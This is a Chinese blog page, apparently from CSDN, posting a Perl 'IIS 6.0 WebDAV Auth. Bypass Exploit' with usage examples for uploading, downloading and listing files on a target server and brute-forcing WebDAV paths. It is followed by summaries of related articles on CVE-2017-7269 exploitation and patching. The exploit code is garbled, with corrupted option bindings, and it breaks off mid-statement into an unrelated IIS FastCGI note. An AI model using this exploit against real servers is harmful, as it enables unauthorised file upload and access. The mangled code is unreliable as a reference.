IIS 6.0 远程溢出漏洞

AI权益加码!Claude Code、Cursor等20+工具免费用! 购周边限时加赠Coding Plan Lite,畅享主流AI工具!学习进阶更高效! 阅读详情

Oday摘要: 发布日期:2010-10.03发布作者:FoXHaCkEr影响版本:IIS6.0官方地址:Microsoft漏洞类型:远程溢出漏洞描述:微软IIS6.0一个远程溢出漏洞代码exp:#!/usr/bin/perl#*********!!!WARNING!!!*********#*FORSECURITYTESTiNGONLY!*#***********************************#

 

发布日期:2010-10.03
发布作者:FoX HaCkEr

影响版本:IIS 6.0
官方地址:Microsoft

漏洞类型:远程溢出

漏洞描述:微软IIS 6.0 一个远程溢出漏洞代码

exp: #!/usr/bin/perl
# ********* !!! WARNING !!! *********
# * FOR SECURITY TESTiNG ONLY! *
# ***********************************
# MS IIS 6.0 WebDAV Auth. Bypass Exploit v1.1
# v1.1 add brute force dir fuction.
# v1.0 download?upload and list dir.
#
# Usage:
# IIS6_webdav.pl -target -port -method -webdavpath|-BruteForcePath [-file]
# -target &nbs p; eg.: 192.168.1.1
# -port eg.: 80
# -method eg.: g
# (p:PUT,g:GET,l:LIST)
# -webdavpath eg.: webdav
# -BruteForcePath eg.: brute force webdav path
# -file (optional) eg.: test.aspx
# Example:
# put a file:
# IIS6_webdav.pl -t 192.168.1.1 -p 80 -m p -x webdav -f test.aspx
# get a file:
# IIS6_webdav.pl -t 192.168.1.1 -p 80 -m g -x webdav -f test.aspx
# list dir:
# IIS6_webdav.pl -t 192.168.1.1 -p 80 -m l -x webdav
# brute force + list dir:
# IIS6_webdav.pl -t 192.168.1.1 -p 80 -m l -b dirdic.txt
# brute force + get file:
# IIS6_webdav.pl -t 192.168.1.1 -p 80 -m g -b dirdic.txt -f test.aspx

use IO::Socket;use Getopt::Long;

use threads;
use threads::shared;

# Globals Go Here.
my $target; # Host being probed.
my $port; # Webserver port.
my $method; # HTTP Method, PUT GET or .
my $xpath; # WebDAV path on Webserver.
my $bpath; # Bruteforce WebDAV path.
my $file; # file name.
my $httpmethod;
my $Host_Header; # The Host header has to be changed

GetOptions(
"target=s" ; => /$target,
"port=i" => /$port,
"method=s" => /$method,
"xpath=s" => /$xpath,
"bpath=s" => /$bpath,
"file=s"

IISFastCGI漏洞处理方法 在服务器上根目录新建一个phpinfo()的JPG文件test.jpg,访问http://www.xxx.com/test.jpg/1.php(test.jpg后面的php名字随便写),如果有漏洞则可以看到phpinfo()的信息,反之会返回404错误。一般来说网上多是nginx用户有此漏洞,此处客户的环境是windows server 2008R2的IIS,这里我在‘处理程序映射’里找到php的双击进入此界面。这篇文章主要介绍了IISFastCGI漏洞处理方法,需要的朋友可以参考下。 阅读详情

相关推荐

CVE-2017-7269)IIS6.0远程代码执行漏洞

一.漏洞介绍 IIS6.0在Web服务扩展中开启WebDAV,webDAV服务存在缓冲区溢出漏洞,造成远程代码执行 二.漏洞影响 Windows Server 2003 三.复现过程 环境:kali(10.0.78.19) Windows Server 2003(10.0.78.20) 1.打开Windows Server 2003中IIS的WebDAV 2.下载EXP 下载网址:https://github.com/zcgonvh/cve-2017-7269 将EXP复制到kali的/usr/share

bring_coco的博客 988

Web应用安全:IIS解析漏洞.pptx

IIS解析漏洞 IIS解析漏洞 1、什么是IIS IIS是一种Web(网页)服务组件,其中包括Web服务器、FTP服务器、NNTP服务器和SMTP服务器,分别用于网页浏览、文件传输、新闻服务和邮件发送等方面,它使得在网络(包括互联网和局域网)上发布信息成了一件很容易的事。 2、IIS的安全脆弱性 IIS的安全脆弱性曾长时间被业内诟病,一旦IIS出现远程执行漏洞威胁将会非常严重。远程执行代码漏洞存在于 HTTP 协议堆栈 (HTTP.sys) 中,当 HTTP.sys 未正确分析经特殊设计的 HTTP 请求时会导致此漏洞。 成功利用此漏洞的攻击者可以在系统帐户的上下文中执行任意代码,可以导致IIS服务器所在机器蓝屏或读取其内存中的机密数据。 IIS解析漏洞 3、什么是IIS解析漏洞 IIS解析漏洞主要说的是一些特殊文件被IIS服务器在某种情况下被解释成脚本文件格式的漏洞。比如网站管理员配置不当,导致php2、phtml、ascx等等这些文件也被当成脚本文件执行了。甚至某些情况下管理员错误的服务器配置导致.html、.xml等静态页面后缀的文件也被当成脚本文件执行。但是,大部分的解析漏洞

Metasploit实战:利用CVE-2017-7269漏洞获取IIS6.0服务器权限

本文详细介绍了如何利用CVE-2017-7269漏洞通过Metasploit框架获取IIS6.0服务器权限。该远程代码执行漏洞影响Windows Server 2003系统,攻击者可通过精心构造的请求实现完全控制。文章涵盖漏洞检测、模块配置、权限提升及防御建议,为网络安全从业者提供实战指导。

weixin_42542669的博客 277

Windows2008使用-解决漏洞-CVE-2010-2730

随着硬件的升级,操作系统也逐渐进行了版本更新。目前阶段,Windows2016Server、Windows2022Server逐渐成为了以Windows系列的服务器平台系统。对于有些应用而言,由于其业务的固定,可能仍只能运行在Windows2008Server或者Windows2012Server上。有时候我们为安全需要,需要将相关的操作系统涉及的漏洞做修复。最近碰到在一个Windows2008R2 的操作系统漏洞CVE-2010-2730,一顿操作,终于找到了合适的方案,这里分享给大家。

mystonelxj的博客 2278

Windows2008使用-解决漏洞-CVE-2010-3972

对于一些企业而言,其自建的应用系统一般不会频繁调整,但是需要及时对其应用的操作系统做安全加固,以避免不必要的系统宕机或者数据泄露问题。如果操作系统未做及时升级,后期做安全加固就可能会遇到不必要的麻烦,本文讲述了近期对windows2008Server做CVE-2010-2730漏洞加固的一些处理过程。主要探讨常规处理方式以及非常规模式。事实验证,对于系统的漏洞,如有可能,及时更新是有必要,否则就会导致不必要的麻烦。

mystonelxj的博客 1580

Windows系统部分漏洞对应补丁查找对照

Windows操作系统部分漏洞修复所需的补丁信息

qq_41060781的博客 6134

iis解析漏洞

iis服务管理添加模块映射。在网页打开1.php。

SUPER131110的博客 796

metasploit iis6.0溢出远程代码执行漏洞

目标ip:192.168.0.106  本机ip:192.168.0.105 下载这次的exp:cve-2017-7269 将exp复制到/usr/share/metasploit-framework/modules/exploits/windows/iis目录下。(添加到metasploit 里面) 接下来打开metasploit 搜索exp

cs_xiaoqiang的博客 1384

Metasploit复现 IIS6.0远程溢出漏洞

漏洞描述 开启WebDAV服务对IIS 6.0存在缓冲区溢出漏洞都可以导致远程代码执行,所以对于目前的IIS 6.0用户而言,可用的变通方案就是关闭WebDAV服务。 漏洞编号 CVE-2017-7269 漏洞等级 高危 影响产品 Microsoft Windows Server 2003 R2 开启WebDAV服务的IIS6.0 漏洞环境搭建 我的环境是windows 20

土豆回锅的博客 4151

关于iis6.0远程溢出漏洞

漏洞描述 漏洞编号:CVE-2017-7269 发现人员:Zhiniang Peng和Chen Wu(华南理工大学信息安全实验室,计算机科学与工程学院) 漏洞简述:开启WebDAV服务的IIS 6.0被爆存在缓存区溢出漏洞导致远程代码执行,目前针对 Windows Server 2003 R2 可以稳定利用,该漏洞最早在2016年7,8月份开始在野外被利用。 漏洞类型:缓冲区溢出...

weixin_30847865的博客 285

CVE2017-7269 IIS6.0利用MSF远程溢出漏洞提权

漏洞编号:CVE2017-7269 服务器版本:Windows server 2003 中间件:IIS6.0 攻击工具:metasploit POC:CVE2017-7269.rb 靶机IP:192.168.1.175 攻击机IP:192.168.1.195 本地漏洞复现过程,安装windows server 2003 r2 开启IIS服务 利用poc: require '

404 5840

CVE-2017-7269(iis6.0远程代码执行漏洞复现)

前言趁着有时间,没事干,无聊!所以就拿CVE-2017-7269做一个简单的漏洞复现实战演练!下面就对该漏洞进行简单的简介以及复现。漏洞描述漏洞编号:CVE-2017-7269发现人员:Zhiniang Peng和Chen Wu(华南理工大学信息安全实验室,计算机科学与工程学院)漏洞描述:IIS 6.0默认不开启WebDAV,一旦开启了WebDAV支持,安装了IIS6.0的服务器将可能受到该漏洞...

Fly_鹏程万里 2万+

windows漏洞补丁

windows漏洞补丁

IIS 6.0远程代码执行漏洞CVE-2017-7269)

  漏洞简介  Microsoft Windows Server 2003 R2是美国微软(Microsoft)公司发布的一套服务器操作系统。InternetInformation Services(IIS)是一套运行于Microsoft Windows中的互联网基本服务。  Microsoft Windows Server 2003 R2中的IIS 6.0版本中的WebDA...

weixin_33737134的博客 428

Windows Server 2003 R2 IIS 6.0 WebDAV漏洞实战:从环境搭建到权限提升完整记录

本文详细解析了Windows Server 2003 R2 IIS 6.0中的WebDAV漏洞CVE-2017-7269,从环境搭建到权限提升的全过程。通过实战演示远程代码执行(RCE)漏洞的利用方法,帮助安全研究人员深入理解漏洞原理与防御策略,提升网络安全防护能力。

weixin_33748818的博客 421

学着分析CVE-2017-7269 -- IIS 6.0 WebDAV远程代码执行漏洞

简介 CVE编号:CVE-2017-7269 漏洞级别:严重 漏洞影响:Windows Server 2003 r2 IIS6.0 漏洞发现人:Zhiniang Peng和Chen Wu(华南理工大学信息安全实验室,计算机科学与工程学院) 漏洞类型:缓冲区溢出 实验环境 Windows Server 2003 r2 IIS6.0 procexp

giantbranch的专栏 9420

服务器安全配置

1.关闭Sqlserver的xp_cmdshell服务,防止net user 添加用户 http://www.cnblogs.com/wh4am1/p/6664789.html#3662770   2.关于iis6.0远程溢出漏洞 关闭WebDAV服务  http://www.cnblogs.com/wh4am1/p/6636354.html   3、服务器不要安装360,SQLSer...

weixin_33979745的博客 122

IIS6.0 WebDAV安全配置指南:从CVE-2017-7269漏洞看服务器加固

本文深入解析IIS6.0 WebDAV组件中的CVE-2017-7269远程代码执行漏洞,提供从漏洞检测到企业级加固的完整方案。内容包括漏洞机理分析、自动化检测工具对比、紧急处置措施及长期安全运维框架,帮助管理员有效防范高危攻击。

weixin_30733003的博客 407

WebDAV的致命缺陷:CVE-2017-7269漏洞的十年启示录

本文深入分析了CVE-2017-7269漏洞的技术机理与历史影响,揭示了IIS 6.0中WebDAV组件的缓冲区溢出漏洞如何导致远程代码执行。通过详细的技术解析和实际案例分析,探讨了该漏洞对现代安全体系建设的启示,包括系统生命周期管理、防御纵深体系建设等关键安全实践。

wind6的博客 856
上一篇: Mssql 注入攻击,普通权限用户提权操作
下一篇: PostgreSQL 注入整理
hack8
博客等级 码龄18年 109粉丝 128原创
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值